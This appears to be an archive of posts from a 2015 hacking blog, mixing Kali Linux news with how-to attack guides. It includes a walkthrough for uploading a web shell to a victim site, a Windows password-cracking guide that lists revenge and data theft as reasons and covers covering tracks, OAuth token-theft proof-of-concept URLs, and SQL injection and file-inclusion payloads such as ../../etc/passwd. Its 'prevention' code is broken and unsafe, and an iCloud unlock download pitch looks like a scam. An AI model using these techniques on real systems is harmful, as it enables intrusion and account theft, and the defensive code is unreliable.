Friday, 14 August 2015

New Kali Linux 2.0 Released With Better Penetration Testing

By With


Our Next Generation Penetration Testing Platform


Offensive Security, the creators of Swiss army knife for Security researchers, Penetration testers and Hackers have finally released the much awaited and most powerful version of Kali Linux 2.0.

Kali Linux 2.0 (Codename ‘Kali Sana’), an open-source penetration testing platform brings hundreds of Penetration Testing, Forensics, Hacking and Reverse Engineering tools together into a Debian-based Linux distribution.

Kali Linux 2.0 offers a redesigned user interface for streamlined work experience, along with a new multi-level menus and tool categories options.
Kali Linux 2.0 is now a rolling distribution, means users will receive tools and core system updates frequently.

Kali Linux 2.0 Features:


  1. Runs on Linux kernel 4.0, 
  2. use full Gnome 3 Desktop instead of gnome-fallback, 
  3. improved hardware and wireless driver coverage, 
  4. support for a variety of Desktop Environments, 
  5. updated desktop environment and tools, 
  6. Featuring new cutting-edge wireless penetration tools, 
  7. Kali Linux now added desktop notifications, so that you do not miss anything, 
  8. Support Ruby 2.0, which will make Metasploit will load much faster, 
  9. Kali 2.0 added inbuilt screencasting tool so that you can record desktop.
  10. Sadly, Kali team has removed the Metasploit Community and Pro packages. Instead, now just offers open-source Metasploit-framework package pre-installed.

Video Teaser

https://vimeo.com/132329259


Upgrade to Kali 2.0


Kali Linux users can upgrade their Kali 1.x to Kali 2.0 without reinstalling whole operating system from scratch. To do this, you will need to edit your source.list entries, and run a dist-upgrade as shown below. 

cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot

Download Kali 2.0 Penetration Testing Platform
  • Kali Linux 2.0 is available to download in following flavors...
  • Kali Linux 64 bit
  • Kali Linux 32 bit
  • Kali Linux VMWare or VirtualBox images
  • Kali 2.0 for ARM architecture

you can also download VM images from official website. You can download it either from direct download link or using Torrents.



Monday, 27 July 2015

How to Upload shell from admin panel

By With
Steps To Do.

1. Access to admin panel of website.
2. A shell(You can download it from google).
3. Mozilla Firefox browser.
4. Live http headers(You can download it from google)



1. First login to the admin panel to the website and then try to find a place where we can upload a file like image,pdf,doc etc. In my case I found gallery in my victim website where I can upload images.
2. Now we will gonna upload a shell, but we have to change the extension of the our shell to 'shell.php.jpg' because we are uploading our shell as an image.
3. Before uploading the 'shell.php.jpg' open Live Http Headers and minimize it and then click on upload button. Like I did in following image.



4. Now we have uploaded 'shell.php.jpg' , after that maximize the Live Http Headers and find 'shell.php.jpg' in HTTP headers box like I did in image given below.




5. Now click on that line in which in 'shell.jpg.php' is written and then click replay.
6. After clicking on Replay, a new window will open , now in second box find 'shell.php.jpg' and rename it to 'shell.php' and then again press replay. Like I did in image given below.




7. Now we have successfully uploaded our shell.Now right click on our second image and then click on Copy image location to get our shell link. Like I did in image given below.



Note : Only For Educational Purpose only

Tuesday, 14 July 2015

More than 1,400 Financial institutions in 88 Countries targeted by Banking Trojan in 2013

By With

More than 1400 Financial institutions targeted by Banking Trojan in 2013

As the year draws to a close, we have seen the number of emerging threats like advance phishing attacks from the Syrian Electronic Army, financial malware and exploit kits, Cryptolocker ransomware infections, massive Bitcoin theft, extensive privacy breach from NSA and many more. The financial malware's were the most popular threat this year. Money is always a perfect motivation for attackers and cyber criminals who are continually targeting financial institutions. On Tuesday, Antivirus firm Symantec has released a Threat report, called “The State of Financial Trojans: 2013”, which revealed that over 1,400 financial institutions have been targeted and compromised millions of computers around the globe and the most targeted banks are in the US with 71.5% of all analyzed Trojans. Financial institutions have been fighting against malware for the last ten years to protect their customers and online transactions from threat. Over the time the attackers adapted to these countermeasures and sophisticated banking Trojans began to emerge. According to the report, the number of infections of the most common financial Trojans grew to 337 percent in the first nine months of 2013. Nearly 1,500 institutions in 88 countries were potential targets during 2013. The financial fraud marketplace is also increasingly organized and Cyber criminals are using advanced Trojans to commit large scale attacks. Attackers of all skill levels can enter the arena of financial fraud, as the underground marketplace is a service industry that provides an abundance of resources. Those who lack expertise can simply purchase what they need. For as little as $100, an attacker can avail of a leaked Zeus or Spyeye equipped with Web-injects. The modern financial Trojan is extremely flexible, supporting a range of functionality designed to facilitate fraudulent transactions across a variety of services. Two dominant attack strategies are: Focused attack: This approach suits attackers with limited resources but also scales well to larger operations. If the distribution is accurate and the target institution has a sizeable client base, a focused attack can provide an adequate supply of targets. Shylock, Bebloh and Tilon all use this approach exclusively. Broad strokes: In this attack strategy, Trojans are set to target large numbers of institutions. Tilon, Cridex, and Gameover adopt these tactics and Zeus also uses this approach in its default configuration. According to Symantec, the main reason for the surge is weak authentication practices: Unfortunately, in many situations, security implementations adopted by financial institutions are inadequate to defend against the modern financial Trojan. Institutions are starting to adopt strong security measures like chipTAN, but the adoption rate is slow. Institutions that persist with weaker security measures will continue to be exploited by attackers. They need to maintain constant vigilance, apply software updates, maintain an awareness of new threats and deploy complementary security solutions that can defend against evolving malware attack

Hacking For Beginners Book

By With

Download

While using this book and reading various hacking tutorials, you agree to follow the below mentioned terms and conditions:

1. All the information provided in this book is for educational purposes only. The book author is no way responsible for any misuse of the information.

2. 'Hacking for Beginners' is just a term that represents the name of the book and is not a book that provides any illegal information. 'Hacking for Beginners' is a book related to Computer Security and not a book that promotes hacking/cracking/software piracy.

3. This book is totally meant for providing information on 'Computer Security', 'Computer Programming' and other related topics and is no way related towards the terms 'CRACKING' or 'HACKING' (Unethical).

4. Few articles (tutorials) in this book may contain the information related to 'Hacking Passwords' or 'Hacking Email' Accounts' (Or Similar terms). These are not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorized access. However you may try out
these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.

5. The virus creation section in this book provides demonstration on coding simple viruses using high level programming languages. These viruses are simple ones and cause no serious damage to the computer. However we strongly insist that these information shall only be used to expand programming knowledge and not for causing malicious attacks.

6. All the information in this book is meant for developing Hacker Defense attitude among the readers and help preventing the hack attacks. 'Hacking for Beginners' insists that this information shall not be used for causing any kind of damage directly or indirectly. However you may try these codes on your own computer at your own risk.

7. The word "Hack" or "Hacking" that is used in this book shall be regarded as "Ethical Hack" or "Ethical Hacking" respectively.

8. We believe only in White Hat Hacking. On the other hand we condemn Black Hat Hacking.

9. Most of the information provided in this book are simple computer tricks (may be called by the name hacks) and are no way related to the term hacking.

10. Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided in the book.

The Hacker’s Underground Handbook

By With

Download

Learn What it Takes to Crack Even the Most Secure Systems.
Liability Disclaimer

The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word "Hack" or "Hacking" in this eBook should be regarded as "Ethical Hack" or Ethical hacking respectively.You implement the information given at your own risk.

Hacker’s Challenge Test Your Incident Response Skills Using 20 Scenarios

By With



HACKERS CHALLENGE:TEST YOUR INCIDENT RESPONSE SKILLS USING 20 SCENARIOS


"Hackers Challenge will definitely challenge even the most technically astute I.T.
security pros with its ripped from the headlines' incident response scenarios. These
based-on-real-life vignettes from a diverse field of experienced contributors make for
page-turning drama, and the reams of authentic log data will test the analytical skills
of anyone sharp enough to get to the bottom of these puzzling tableaus."

Saturday, 20 June 2015

How to Hack Windows admin password

By With

Today, i am going to show you many aspects of the Windows Password Storage path, Method of Encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:

1) Sometime we have forgotten our old password and Hint isn't helping out.
2) We want to break into someone computer to get the information.
3) Just want to take revenge from someone.
4) Stealing computer data.

Lets, take a deep dive in Cracking Windows password and also where these are stored and in which format.

SAM file and Password Hashes~Place where these passwords are stored in Hashes:

Password Hashes - When you type your password into a Windows NT, 2000, or XP login Windows Seven, Vista etc Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:
                    7524248b4d2c9a9eadd3b435c51404eddc5

This is a password Hash. This is what is actually being checked against when you type your password in. It encrypts what you typed and bounces it against what is stored in the Registry and/or SAM File. 

You can break this hash password from
SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

Location of SAM/Hashes:

You can find what you're looking for in several locations on a given machine.
It can be found on the hard drive in the folder %systemroot%system32config (i-eC:\windows\system32\config). However this folder is locked to all accounts including Administrator while the machine is running. The only account that can access the SAM file during operation is the "System" account.

The second location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use.(GO to Run and Type Regedit and Hit enter, Now scroll to HKEY_LOCAL_MACHINESAM, However you may not access to it.)

So the two (Some other also) locations of the SAMHashes are:

- %systemroot%system32config

- In the registry under HKEY_LOCAL_MACHINESAM
Cracking or Breaking Into Admin Account:
How to get Hashes form SAM file? 

Well, Below are the methods to do so:
1) Well, the easiest way to do this is to boot your target machine to an alternate OS like
NTFSDOS or Linux and just copy the SAM from the %systemroot%system32config  folder. 
It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals(http://www.sysinternals.com) The regular version of NTFSDOS is freeware, which is always nice, but only allows for Read-Only access. This should be fine for what you want to do, however, if you're the kind of person that just has to have total control and has some money to burn. NTFSDOS Pro, which is also by Sysinternals has read/write access but it'll cost you $299.

2) You can also get password hashes by using pwdump2 (Google It to get software ~ Search at openwall.com). pwdump uses .DLL injection in order to use the system account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can then  paste them into a password cracking utility like l0phtcrack or John the ripper (Linux Based works well) also cain and abel can be used.

3) Import Hashes directly from l0phtcrack, and let them open to you by cracking.


Obtained Hashes? Now crack them:
Well, as i have said that these can't be reversed but somehow automated famous cracking softwares can be used to achieve the target. Yes, it is possible, All we have to do is to have a bit patience. The software will use a lot of strings and will compare these hashes also, Inshort it will decode them.

1) John the Ripper - John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of all it's free and in open source. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.

2) 
L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.

Making Your Own Password in Windows: 

Injecting Password Hashes into the SAM:
Easiest ways to gain Administrator privileges on a machine, is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brain larger than a peanut. Using a utility called "
chntpw" by Petter Nordhal-Hagen you can inject whatever password you wish into the SAM file of any NT, 2000, or XP machine thereby giving you total control, just burn the .iso on a disk and use it. I would give a tip like backing up the SAM file first by using an alternate OS.Make a USB disk of linux or Windows Live dsik can also work. Go in, inject the password of your choosing. Login using your new password. Do what you need to do. Then restore the original SAM so that no one will know that i was hacked.

You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you’ve forgotten the original (going through the Control Panel can require confirmation of the old password).

Now we hack Admin Password To verify the user name, by simply typing net user, I get a list of all the user names on that windows machine. Now, go to the command prompt and enter:

cd\
cd windows\system32
net user  
If there are people near you and you don’t want them to see the password you type, enter:
net user *

 E.g. > net user username *
 > Type a password for the user:
> Confirm the password:




Another Easy method, Using  ophcrack to Hack into Admin Account:

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.


This is a type of offline cracking, Just grab .iso of ophcrack from here. Burn it and enjoy using.

1.  Opchrack can crack passwords for Windows 7, Windows Vista, and Windows XP.

2. Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any  14-character or smaller password that uses any combination of numbers, 
small letters, and capital letters should be crackable.

3.  Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.

4.  The Ophcrack LiveCD option allows for completely automatic password recovery.

5.  LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.

6.  No Windows passwords need to be known to use the Ophcrack Li
veCD to crack your Windows passwords.


I think this ophcrack method is far better, Try this one just get a disk and write it, Or else USB disk can aslo be used.

Some security Tips ~ Making strong passwords:

Now, You might have come to know that how passwords can be cracked, So there are some tips for you.

1) Do not make common passwords like 123456 or the one of your own name.

2) Use @, *, # or other symbols in your passwords to ensure maximum security in this case John the ripper and Ophcrack and also other cracking tools may take long time, it will be frustrating for hacker.

3) Keep changing your password. So, that if long time is taken by one hash to decode, until it decodes you have generated another hash.


How to Bypass iColud Activation Lock

By With


iCloud Apple iD BruteForcer 

This tool is released by "Pr0x13" at GitHub. Attackers to break into any iCloud account, potentially giving them free access to victims’ iOS devices.

How to Install: 
Put in HtDocs Folder in your Xampp installation.
Install cUrl for your OS
Navigate to http://127.0.0.1/iDict/ in your web browser (preferably Firefox, Chrome, or Safari).

Wordlist.txt is from iBrute and it satisfies iCloud password Requirements
It's been reported if icloud server responds with an error restart xampp or 
your computer

-=Reports coming in that Server is now Patched with Rate Limiter=-
-=Server Fully Patched, Discontinue use if you don't want to lock your account!!=-

What is this?
A 100% Working iCloud Apple ID Dictionary attack that bypasses 
Account Lockout restrictions and Secondary Authentication on any account.

What this isn't:
A bypass or fully automated removal

Why? 
This bug is painfully obvious and was only a matter of time before it was 
privately used for malicious or nefarious activities, I publicly disclosed it so apple will patch it.


Credit: @Pr0x13

How to Unlock iCloud Activation Lock

First is need to Download the hack tool on your pc. Go on Download Button below and get this software. We give this for free, not is need to pay.

Unlock iCloud Lock Download BypassTool


Step 1. Download and Unzip the file on your PC.
Step 2. Start this hack tool on your PC. Connect your iPhone via USB cable.
Step 3. Then click on Start button to process bypass icloud lock service.
Step 4. Wait five min to be complete this process. When will be done click OK.

The finaly process is when this will be complete to install the latest versizon on iTunes on your PC. Then make Restore Update on your device and icloud lock will be permanent removed from your apple device. This is official factory unlock on iCloud lock directly from Apple Database Servers.

Many services in the world talk for this on net, but be careful, many of them is scam. We this service give you for free, and not like to give money to us. Only Download this hack tool and enjoy.

Dear Readers if like to Unlock for Not free in five min your iCloud Lock on your iPhone go here on this Factory Unlock iPhone company. This is safely service we test. – iPhoneOfficialUnlock


Disclaimer: This post is knowledge purpose only. 
We are not responsible for any damage done whatsoever to anyones iCloud account or iDevices.

How to Hack Instagram Account

By With

Nir Goldshlager Founder of Break Security find the critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos.

1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram Include OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar,  Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,

So, first,  checked Instagram’s OAuth protocol:  (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.


In addition, redirection was only allowed to go to the owner app domain.
Thus, hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.


Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
 Video:

Source: Breaksec

How Can We Block Common Web Attacks And Protect Our Website.

By With
A: SQL Injection 
               

      Login Form Bypassing  UNION SQL Injection

 B: Cross Site Scripting

       Cross Site Request Forgery

C: File Inclusion
      Remote File Inclusion and Remote Code Execution
   



On this post i am telling about five types of common web attacks, which are used in 
most types of defacements or dumps of databases. 
The five exploits listed above are SQL injection, XSS, RCE, RFI, and LFI. Most of the 
time, we missed out some website code tags.. 
becoz of this we get website attacks and allows the hacker for attack on vulnerable website. 

A: SQL Injection

--> LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:
<form action="login.php" method="POST" />
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// EXAMPLE CODE
$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";
$result = mysql_query($execute);
?>


We can simply bypass this by using ' or '1=1', which will execute "password = ''or '1=1'';".

Alternatively, the user can also delete the database by executing "' drop table database; --".

PREVENTION:

Use mysql_real_escape_string in your php code.

Example:

<?php
$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword);
$message = "SELECT * from database WHERE password = "'$badword'";
echo "Blocked " . $message . ";
?>


--> UNION SQL Injection

UNION SQL injection is when the user uses the UNION command. The user checks for the vulnerability by
adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1'

You have an error in your SQL syntax near '' at line 1 SELECT SUM(quantity) 
as type FROM orders where (status='completed' OR status='confirmed' OR status='pending') AND user_id=1'


No error--> http://www.site.com/website.php?id=1 ORDER BY 1--  

 Two columns, and it comes back with an error! This means that there is one column.
 http://www.site.com/website.php?id=1 ORDER BY 2-- 

Selects the all the columns and executes the version() command on the only column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()-- 

SOLUTION:

Add something like below to prevent UNION SQL injection.

$evil = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($evil, "", $patch);


>-------------------------------------------------------<

B: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, most likely users will try to inject the site with malicious javascript or try to
scam users by creating a form where users have to type their information in.
 Two types of XSS (cross site scripting) are persistent XSS and non-persistent XSS.

Example:
http://www.site.com/search.php?q=">

SOLUTION
(javascript) (Thank you, Microsoft!):

function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
}

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

C: File Inclusion

 Types: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). This code is mostly patched on websites, but some websites are still
vulnerable to the vulnerability. RFI usually leads to remote code execution or javascript execution.

Example of the vulnerable code:

<?php
include($_GET['page']);
?>


Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/xyz.txt?

SOLUTION:

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}


For remote code execution, the site would have to have a php executing command. You would patch this by about doing the same thing.

 Note: Hope this post will helpful for your website to secure from these types of attacks..

Recent posts